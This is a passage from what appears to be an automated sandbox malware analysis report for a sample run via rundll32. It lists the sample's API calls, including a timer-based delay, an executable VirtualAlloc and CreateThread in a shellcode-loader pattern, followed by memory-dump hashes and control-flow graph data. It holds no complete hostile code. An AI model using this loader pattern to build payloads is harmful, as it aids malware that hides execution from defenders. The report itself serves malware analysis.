                                      DispatchMessageW( &_v40);
                                  }
                                  return _t45;
                              }


                              APIs
                              • SetTimer.USER32(00000000,00000000,0000025B,00000000), ref: 007B3791
                              • GetMessageW.USER32 ref: 007B37A1
                              • DispatchMessageW.USER32(?), ref: 007B37C3
                              • VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 007B381C
                              • Sleep.KERNEL32(000001F4), ref: 007B3830
                              • CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 007B3860
                              • SetTimer.USER32(00000000,00000000,00002000,00000000), ref: 007B3874
                              • GetMessageW.USER32 ref: 007B3884
                              • DispatchMessageW.USER32(?), ref: 007B38A6
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_780000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
                              • String ID: @
                              • API String ID: 368155642-2766056989
                              • Opcode ID: 0ed0f3c26014fd56efe24855b3168cf125f359ad45015d5f23035be1df4c36ff
                              • Instruction ID: 63652ecb9a1a9e08397d97ea2cd21bd5fcba759259847b9ae9acec2a7f53618a
                              • Opcode Fuzzy Hash: 0ed0f3c26014fd56efe24855b3168cf125f359ad45015d5f23035be1df4c36ff
                              • Instruction Fuzzy Hash: 8541FFB0E40218EBEB14DFA4DD89FEDB775BB48705F208254F6017A1C0D779AA40DB69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Basic blocks (id: address range):
                              22: 7c2720-7c2766
                              23: 7c2768-7c2774
                              24: 7c2776-7c2782
                              25: 7c278e-7c27c8
                              26: 7c2784-7c278d
                              32: 7c27cb-7c27d4
                              33: 7c27da-7c2808
                              35: 7c280a-7c2813
                              36: 7c2817-7c282d

                              Edges:
                              22->23, 23->23, 23->24, 24->25, 24->26, 25->32, 26->25, 32->33, 33->35, 33->36, 35->36
                              Memory Dump Source
                              • Source File: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7c0000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4fbc9169981b45fd04b6c840e8e75f66a8f698123987a24c0b288b45893942f2
                              • Instruction ID: 05b00525b3143d250a4efa4c0197844d8969dbcda2d812a502e17f680c0ff937
                              • Opcode Fuzzy Hash: 4fbc9169981b45fd04b6c840e8e75f66a8f698123987a24c0b288b45893942f2
                              • Instruction Fuzzy Hash: 39412BB5604205AFEB08CF18DC45DAABBEDFB48321B10855DF909CB342DA31ED41CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Basic blocks (id: address range):
                              37: 7c27cb-7c27d4
                              38: 7c27da-7c2808
                              40: 7c280a-7c2813
                              41: 7c2817-7c282d

                              Edges:
                              37->38, 38->40, 38->41, 40->41
                              Memory Dump Source
                              • Source File: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7c0000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e33fe5da96f720e4fe6e238dac6dffeaa3174ff5709e0af4cc75d5c3c910f501
                              • Instruction ID: b6a2238db6aa4106d0dc4c35ecc958fb3914f0f4c5bae18702f2ce7d263d13f1
                              • Opcode Fuzzy Hash: e33fe5da96f720e4fe6e238dac6dffeaa3174ff5709e0af4cc75d5c3c910f501
                              • Instruction Fuzzy Hash: E801E8B5600209AFCB44DF18C84495ABBE9FF88310B15C999FC19CB302D730ED91CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions